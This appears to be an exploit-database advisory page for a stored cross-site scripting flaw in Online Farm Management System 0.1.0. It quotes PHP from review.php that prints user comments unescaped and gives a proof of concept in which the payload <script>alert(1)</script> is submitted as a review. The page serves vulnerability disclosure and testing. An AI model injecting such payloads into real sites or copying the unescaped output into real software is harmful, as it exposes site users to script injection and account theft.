Advertisement






Online Farm Management System 0.1.0 Persistent Cross-Site Scripting

CVE Category Price Severity
CVE-XXXX-XXXX CWE-79 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2020-08-02
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.012082 0.70779

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020080017

Below is a copy:

Online Farm Management System 0.1.0 Persistent Cross-Site Scripting
# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage:  https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
# Software Link:  https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
# Version: 0.1.0
# Tested on: Kali Linux

Source code(review.php):
<?php
if($result) :
while($row1 = $result->fetch_array()) :
?>
  <div class="con">
  <div class="row">
  <div class="col-sm-4">
  <em style="color: black;"><?= $row1['comment']; ?></em>
</div>


POC:

1. http://192.168.1.58/a/review.php?pid=31 go
2. We send the payload (<script>alert(1)</script>)
3. Write a review payload and submit
4. And refresh the page

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum